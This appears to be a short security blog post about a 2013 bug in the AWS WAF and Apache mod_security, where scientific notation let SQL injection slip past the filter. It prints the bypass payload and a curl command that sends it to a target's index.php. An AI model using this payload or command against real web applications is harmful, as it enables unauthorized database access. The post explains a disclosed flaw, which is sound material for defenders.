AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.
Find below the payload used for the attack showing the scientific notation:
"x=1' or 1.e(1) or '1'='1"
Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:
$ curl -i -H "Origin: http://domain" -X POST \ "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"
We are sorry that this post was not useful for you!
Let us improve this post!
Tell us how we can improve this post?